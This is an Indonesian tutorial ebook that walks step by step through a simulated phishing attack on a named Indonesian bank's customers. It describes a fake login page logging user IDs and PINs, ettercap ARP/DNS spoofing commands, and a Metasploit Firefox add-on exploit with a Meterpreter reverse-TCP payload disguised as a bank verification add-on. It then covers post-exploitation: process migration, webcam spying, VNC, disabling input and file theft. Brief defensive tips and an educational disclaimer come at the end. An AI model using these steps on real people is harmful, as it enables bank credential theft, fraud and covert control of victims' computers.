simulasi penyerangan phising dengan mitm dan metasploit

24
  SIMULASI PENYERANGAN PHISING DENGAN MITM DAN METASPLOIT INDONESIAN BACKTRACK TEAM By Muhammad Irfan Sulaiman

Upload: muhammad-irfan-sulaiman

Post on 08-Oct-2015

110 views

Category:

Documents


5 download

DESCRIPTION

Simulasi penyerangan dalam Dunia Maya , Phising dengan MITM dan Metasploit. beserta kasus dan pembahasan kasusnya

TRANSCRIPT

  • SIMULASI PENYERANGAN PHISING DENGAN MITM DAN METASPLOIT

    INDONESIAN BACKTRACK TEAM

    By Muhammad Irfan Sulaiman

  • I. PENDAHULUAN Sebelum kita memulai ke materi sebaiknya kita mengetahui terlebih dahulu apa itu Phising , MITM dan Metasploit .

    Phising adalah suatu bentuk kegiatan penipuan yang dilakukan untuk mendapatkan informasi penting seperti username, password, PIN dan sebagainya.

    Ketika kita sedang melalukan browsing diinternet, kegiatan phising ini sudah tidak asing lagi. Kenapa? Karna sampai saat ini kegiatan phising masih ada Akibatnya banyak orang yang kehilangan akun bank miliknya maupun data pribadi tentang kartu kredit miliknya . Tujuan dari phising ini sangat jelas yakin ingin mencuri data pribadi korban, entah username atau password korban ataupun identitas kartu kredit korban . Sehingga maraknya kejahatan cyber diindonesia faktor utamanya adalah Phising , dengan phising ini si attacker dapat melakukan tindakan Carding yakni melakukan transaksi online dengan kartu kredit orang lain . Disini saya tidak mengajarkan tentang carding maupun phising attack, tetapi saya hanya memberikan simulasi sederhana dari phising yang banyak orang abaikan tentang ancaman tersebut . Diluar dari itu saya tidak bertanggung jawab.

    MITM adalah singkatan dari MAN IN THE MIDLE ATTACK yang artinya dimana posisi attacker berada ditengah-tengah korban yang sedang melakukan percakapan, Si attacker ini mempunyai kemampuan untuk menyadap, mencegat, mengubah , bahkan mengontrol data / pesan diantara korban yang sedang melakukan percakapan tersebut.

    Pada umumnya MITM hampir sama dengan Sniffing yaitu melakukan penyadapan tetapi ada perbedaan yang sangat mendalam dari MITM dan SNIFFING . Sniffing adalah salah satu kegiatan passive attack karna si attacker

  • hanya memantau / menyadap data korba saja tanpa melakukan perubahan-perubahan terhadap data tersebut. Tetapi kalau MITM berbeda, selain menyadap MITM dapat melakukan pengubahan data terhadap data yang disadapnya dan dapat mengontrol penuh atas data tersebut sehingga MITM disebut active attack . Untuk lebih jelasnya tentang MITM perhatikan scenario berikut tentang serangan MITM .

    Didalam scenario tersebut terdapat 4 tipe serangan, yaitu :

    Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob. Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan Bob Im going to sleep, Bye!. Dengan begini Bob mengira Alice masih berkomunikasi dengannya. Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie. Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice. Nah bisa anda bayangkan sekarang betapa bahayanya dari serangan MITM ini .

    Metasploit adalah sebuah framework yang digunakan untuk hacking berbagai jenis aplikasi, sistem operasi, aplikasi web dll . Atau bisa dibilang software yang diciptakan untuk melakukan exploitasi / hacking . Di Kali linux atau OS pentest lainnya Metasploit ini sudah terinstall didalamnya . Bagi yang belum punya metasploit bisa download di http://www.metasploit.com/

  • II. KASUS Dalam kasus ini saya akan mensimulasikan penyerangan phising dengan MITM dan Metasploit. Disini saya skenariokan Pak Joni adalah salah satu pengusaha migas terbesar diseluruh ASEAN yang menjabat sebagai Direkur Utama. Pada suatu hari Pak Joni ingin membeli transportasi darat dan laut di Eropa untuk keperluan perusahaannya tersebut , Tetapi karna Pak Joni sedang meeting dan pembelian transportasi tersebut harus cepat dibeli Pak Joni menggunakan system pembelian Online atau dikenal dengan Online Shop diKantor . Pak Joni melakukan transaksi tersebut melalui salah satu bank ternama diIndonesia . Nah setelah Pak Joni melakukan Login ke dalam Internet Banking milik Bank tersebut, Pak Joni menambah Saldo Rekeningnya dengan mentrasfer Uang dari rekening Bank yang lainnya ke Rekening tersebut. Beberapa menit kemudian Pak Joni kaget, Karna Saldo yang ada direkiningnya tersebut habis seketika dan Tiba-tiba laptop Pak Joni hang dan mati dengan sendirinya . Berdasarkan scenario diatas saya akan membuat simulasinya bagaimana saldo dari akun rekeningnya miliknya bisa habis , dan bagaimana tiba-tiba laptopnya bisa mendadak mati? Ada apa gerangan?

    III. STUDI KASUS Setelah kita mengetahui dari kasus diatas, Saya disini sebagai attacker akan melakukan serangan Phising dengan MITM dan Metasploit yang dialami seperti Pak Jono . Disini saya menggunakan OS Kali Linux 1.0.9 dan Targetnya adalah Windows 7 Ultimate 64bit . Saya berada diluar ruang rapat dengan Pak Jono dan Berada didalam satu jaringan Wifi Kantor . Pertama-tama saya akan membuat halaman phising sederhana yang bertujuan untuk

    mengelabuhi si target, sesuai dengan kasusnya saya akan membuat halaman Internet Banking diIndonesia .

  • Disana terdapat 3 File dan 1 Folder . -File index.php adalah Tampilan phising dari salah satu halaman web internet banking Indonesia . -File post.php adalah file yang berisi pemograman untuk mendapatkan username dan password dari halaman phising yang direkam difile logs.txt . -File logs.txt adalah file yang berisi username dan password korban. -Dan folder index_files adalah folder yang berisi atribut-atribut lainnya agar halaman phising yang kita buat sama persis dengan halaman aslinya. Lalu file-file tersebut saya pindahkan ke dalam web server saya, Untuk dikali linux lokasi web servernya ada di

    Didalam folder /var/www tersebut secara default ada file index.html bawaan dari web servernya, File tersebut boleh kita hapus atau kita ganti namanya . Agar tidak terjadi konflik dengan file index.php . Setelah kita pindahkan semua file phising kita, file-file tersebut belum bisa dieksekusi karna belum ada hak aksesnya .

    Lalu kita beri hak akses file tersebut agar dapat dieksekusi dengan perintah :

    Dan untuk folder beserta isi-isinya dengan perintah :

    Sehingga tampilannya jadi seperti ini yang menandakan bahwa file dan folder kita sudah diberi hak akses untuk dieksekusi.

    Kedua, Setelah file-file phising kita sudah kita persiapkan lalu kita aktifkan service web server kita . Dikali linux web servernya menggunakan apache , kita aktifkan apache kali linux dengan perintah :

  • Jika OK seperti ini berarti service apache berhasil diaktifkan, jika tidak apache kali linux anda mengalami masalah.

    Ketiga, Sampai disini kita lakukan uji coba terlebih dahulu dari phising yang kita

    buat. 1. Buka browser anda dan masukan diurl localhost atau 127.0.0.1 tanpa tanda petik.

    Maka akan terbuka halaman phising yang kita buat tadi . 2. Kita coba isikan USER ID dan PIN , dan setelah berhasil login tersebut akan dialihkan ke halaman resminya . Ini terserah kita mau dialihkan ke halaman mana saja tergantu dari kode program phising yang kita buat , dalam hal ini saya alihkan ke halaman situs aslinya guna untuk mengelabui korban (Pak Jono) . 3. Setelah login, kita cek file logs.txt difolder var/www/ karna file inilah yang merekam USERID dan PIN tersebut . Dengan perintah cat logs.txt atau bisa juga dibuka melalui text editor lainnya .

  • Bisa dilihat digambar diatas berarti halaman phising kita berjalan dengan lancer, tertulis disana Korban Masuk , USER ID : jonosulityo dan PIN : 123456 . IP Addressnya dari localhost , Tanggalnya adalah 1 februari 2015 jam 12:50am . Disini kita baru selesai mengatur halaman phising kita, Kita belum melakukan MITM dan metasploit lainnya.

    Keempat, Kita lakukan serangan MITM dengan tools dari kali linux yaitu Ettercap. 1.Pertama-tama kita harus melakukan konfigurasi ettercap terlebih dahulu. File yang perlu dikonfigurasi adalah file etter.dns .

    Kita ganti Microsoft.com dengan web internet banking yang akan digunakan sikorban, dalam kasus ini sebagai target saya menggunakan web ibank.klikbca.com.

  • dan saya ubah IP tersebut dengan IP saya . Dan kita save dengan perintah ctrl+x dan Y lalu enter . 2. Kita aktifkan forward IP kita dikali linux dengan perintah :

    Perintah ini untuk memberikan nilai 1 atau True kepada ip_forward yang berarti untuk memberikan perintah aktif pada ip_forward. Untuk mengeceknya lakukan perintah berikut :

    Jika hasilnya 1 berarti sudah aktif dan jika masih 0 lakukan perintah sebelumnya lagi.

    Kelima, Sampai disini ettercap sudah bisa dijalankan tetapi kita persiapkan metasploit dulu . Metasploit ini berguna untuk mendapatkan akses penuh pada Komputer korban , yang nantinya selain saya mendapatkan USERID dan PIN pak jono saya juga mendapatkan akses penuh terhadap komputer pak jono . Ibarat kata sambil menyelam minum air . hehehe 1.Yap, Jalankan dulu metasploit cukup ketikkan perintah metasploit tanpa tanda petik diterimnal .

  • 2. Metode yang saya akan gunakan dengan metasploit ini adalah dengan Addons dari browser mozila . Ketikkan pada console metasploit perintah berikut use exploit/multi/browser/firefox_xpi_bootstrapped_addon

  • 3. Ketikkan perintah show options untuk melihat opsi yang dibutuhkan .

    Disini yang kita perlu konfigurasi adalah ADDONNAME , SRVHOST , dan URIPATH.

    Saya set ADDONNAMEnya adalah BCA LOGIN VERIFICATION guna untuk mengelabui si korban. SRVHOST adalah IP saya , dan URIPATHnya adalah login. 4. Kemudian kita akan membuat payload atau bisa dibilang virus, nah virus ini adalah ujung tombak kita untuk mendapatkan akses penuh terhadap komputer korban. ketikkan diconsole metasploit perintah berikut : set PAYLOAD windows/meterpreter/reverse_tcp

    Kita cek options apa lagi yang masih kita butuhkan dengan perintah : show options

  • Dan ternyata kita masih membutuhkan konfigurasi LHOST pada payload tersebut, LHOST ini adalah IP kita yang nantinya si payload akan melakukan back connection atau koneksi balik di komputer korban ke komputer kita.

    Setelah selesai semua kita jalankan metasploitnya, ketikkan exploit di console metasploit.

    Disana tertulis USING URL : http://192.168.0.104:8080/login , itu adalah letak virus saya . Saya hanya butuh si korban mengakses url tersebut , Bagaimana caranya? Caranya adalah saya hanya perlu mengubah script phising saya agar ketika korban login akan dialihkan ke url virus tersebut .

  • Keenam, Metasploit sudah selesai dikonfigurasi sekarang saatnya jalankan ettercapnya untuk melakukan MITM . ketikkan perintah berikut diterminal linux : ettercap T q i wlan0 P dns_spoof M arp // //

    -T adalah mode Text . -q adalah mode quiet . -i adalah mode interfaces kita, karna saya menggunakan wifi saya pilih wlan0. -P adalah plugins dalam ettercap saya gunakan dns_spoof. -M adalah untuk mode MITM , disinilah proses serangan MITM terjadi . // // adalah jangkauan target . Saya jelaskan kembali, Jadi ketika pak jono membuka web internet banking tersebut maka yang pak jono buka adalah halaman phising yang saya buat tadi . tetapi pak jono tidak bakal curiga, karna url yang dia tuliskan adalah benar alamat dari internet banking tersebut , karena pak jono sudah terkena serangan MITM saya tadi . Sehingga yang muncul adalah halaman phising saya .

  • Lalu Pak Jono memasukkan USERID dan PIN miliknya dan ketika pak jono mengeklik tombol login yang terjadi adalah pak jono diarahkan ke halaman untuk menginstall Addon Mozila .

    Dan ketika pak jono mengeklik allow maka akan ditampilkan Addon BCA LOGIN VERIFICATION .

  • Addon ini tentunya menyakinkan pak tono untuk menginstallnya karna sekilas mata pak tono tidak curiga bahwa addon ini memang berasal dari pihak bank tersebut . Dan pak tono pasti beranggapan dengan adanya addon ini transaksi internet banking dia jadi lebih aman padahal kenyataannya adalah tidak sama sekali .

    Sampai disini pak tono berhasil terkena phising dan telah menginstall addon virus buatan saya. Dan saya mendapatkan USERID dan PIN akun internet bankingnya serta saya dapat mengontrol komputer pak tono tersebut.

  • Tentunya pak tono pasti bingung kenapa setelah dia install addon mozilanya tampilan internet bankingnya tidak muncul? Yang pak tono akan lakukan selanjutkan adalah membuka kembali halaman internet banking tersebut . Tapi setelah saya sudah berhasil mendapatkan USERID dan PIN serta Virus saya sudah masuk ke dalam komputer pak tono tersebut, maka saya hanya perlu mematikan perintah dari Ettercap yang melakukan MITM tadi. Jadi ketika pak tono mencoba kembali membuka halaman internet bankingnya yang akan tampil adalah halaman asli dari pemilik internet banking tersebut.

    Disini pak tono melakukan login seperti biasa dan transaksi pada biasanya .

  • Ketujuh, kita cek file logs.txt dari phising kita tersebut .

    Setelah kita cek dan ternyata berhasil terekam USERID dan PIN pak jono , kita kembali ke metasploit . Kita cek apakah virus kita sudah benar-benar masuk ke komputer pak jono apa tidak .

    Dan ternyata sudah masuk, Di console metasploit tertulis meterpreter sessions 1 opened yang artinya virus saya berhasil melakukan koneksi balik dari komputer pak jono ke komputer saya .

    Lalu jalankan perintah berikut untuk masuk ke sesinya :

  • Disini saya sudah masuk ke komputer pak jono .

    Langkah berikutnya adalah saya akan melakukan migrasi untuk virus saya ke proses program komputer pak jono yang sedang berjalan. Tujuannya adalah agar virus saya lebih leluasa untuk mengontrol komputer pak jono tersebut , karna pada defaultnya virus saya masih menempel diaddon browser mozila milik pak jono Jika browser itu ditutup oleh pak jono maka virus saya akan hilang dan akan menutup sesi pada komputer saya . Sebelumnya saya akan mencari proses program untuk melakukan migrasi virus saya.

    Dari gambar diatas, saya akan migrasi ke program svchost.exe dengan PID 468 . svchost.exe ini adalah program yang dijalankan oleh windows, yang sekiranya virus saya aman nempel diproses ini.

  • Kedelapan, Setelah virus kita aman dengan melakukan migrasi . Kita tampilkan perintah-perintah yang ada dimetasploit untuk kegiatan lainnya. Dengan perintah help

    Disini saya akan mengecek wajah pak tono dengan webcame milik komputer pak tono. Saya cek terlebih dahulu apakah komputernya memiliki webcame apa tidak .

    Dan ternyata ada , lalu jalankan perintah berikut untuk mengaktifkannya.

    maka akan terbuka dibrowser kita gambar dari webcame milik pak tono tersebut. Hehehe . lalu selanjutnya apa? Saya akan melihat aktifitas apa yang sedang dikerjakan pak tono didesktopnya . Dengan perintah run vnc. dan saya juga bisa menonaktifkan mouse dan keyboard milik pak tono , sehingga pak tono tidak dapat menggerakkan mouse dan mengetik tulisan dikeyboard.

  • Dengan perintah uictl disable mouse dan uictl disable Keyboard . dan untuk mengaktifkannya kembali cukup ganti disable dengan enable. Kurang puas dengan itu, saya juga bisa melakukan remote desktop milik komputer pak jono. Setelah saya nonaktifkan fungsi keyboard dan mouse milik pak jono , saya lakukan remote desktop komputernya. Dengan perintah run getgui e yang tentunya ini akan membuat pak tono bingung kenapa mousenya bisa bergerak sendiri dan komputernya bisa mengetik sendiri , padahal yang menggerakkannya dan yang mengetiknya itu adalah saya. Dan yang terakhir saya lakukan adalah mematikan komputer pak tono melalui metasploit ini.

    Sampai disini komputer pak tono mendadak mati , dan membuat panik pak tono . Dengan metasploit ini saya juga dapat mendownload dan mengupload file-file penting milik pak tono ke komputer saya . Bisa kita bayangkan sekali lagi, betapa bahayanya dari teknik penyerangan ini . Bermula dari phising hingga virus yang dapat mengontrol penuh terhadap suatu komputer .

  • IV. PENCEGAHAN

    Untuk mencegah terjadinya serangan seperti yang sudah saya sampaikan sebelumnya , Serangan awal yang terjadi adalah PHISING dari serangan inilah berlanjut ke serangan-serangan yang lainnya.

    1. Kita harus lebih teliti dalam membuka suatu halaman website, apakah website itu web phising atau tidak Terutama untuk website toko online.

    2. Untuk seluruh website internet banking biasanya dipasang fiture ssl , ssl atau Secure socket layer adalah protokol keamanan yang digunakan pada hampir semua transaksi aman pada internet. Biasanya ditandai dengan https pada saat membuka web tersebut. Perhatikan gambar berikut, gambar ini menunjukkan bahwa webtersebut terpasang fitur ssl dan user untuk mengaksesnya melalui https bukan http . Ini berfungsi memvertifikasi bahwa web yang kita buka adalah benar-benar web aslinya bukan web PHISING.

    3. Dan untuk mencegah serangan MITM. Hal yang bisa kita lakukan adalah dengan menggunakan VPN , karna pada dasarnya MITM dilakukan ketika dalam satu jaringan . Dan VPN (Virtual Private Network) sendiri adalah Jaringan virtual yang bersifat privat yakni milik kita sendiri sehingga ketika kita berada dalam satu jaringan publik IP kita berbeda dengan jaringan

  • sebelumnya karna IP kita berasal dari VPN tersebut. Sehingga serangan MITM tidak dapat menyerang kita karna kita berbeda jaringan. Dan ketika ada serangan MITM yang sedang melakukan sniffing, maka website yang memiliki fitur ssl akan menampilkan pesan error sebagai berikut .

    4. Untuk serangan dari Metasploit. Cara yang paling aman adalah dengan menginstal antivirus, karna pada dasarnya metasploit mengenerate virus . Dan pastikan antivirus yang anda gunakan adalah Antivirus asli bukan bajakan !

  • V. PENUTUP

    Alhamdulillah selesai sudah simulasi penyerangan phising dengan MITM dan Metasploit , Terima kasih kepada ALLAH SWT , keluarga , dan teman-teman Indonesian Backtrack Lainnya yang membantu saya dalam penulisan ebook ini. Saya tekankan cerita didalam buku ini hanyalah scenario yang saya buat dan hanya untuk pembelajaran agar kita lebih waspada terhadap serangan didunia maya terutama dalam melakukan browsing atau transaksi online diinternet sehingga tidak terkena serangan-serangan yang ada seperti didalam buku ini. Dan saya sebagai penulis mohon buku ini dipergunakan secara bijaksana.

    Muhammad Irfan Sulaiman

    Depok, 1 Februari 2015

  • VI. DAFTAR PUSAKA ATTACKING SIDE WITH BACKTRACK (ASWB) v1 - BAB V - MITM ATTACK ATTACKING SIDE WITH BACKTRACK (ASWB) v1 - BAB X METASPLOIT

  • VII. REFERENSI http://indonesianbacktrack.or.id/ https://indonesianbacktrack.or.id/forum/thread-5821.html?highlight=MITM http://chaniagorandy.blogspot.com/2011/04/mengenal-serangan-man-in-middle-mitm.html http://www.priawadi.com/2012/05/pengertian-spamming-snooping-spoofing.html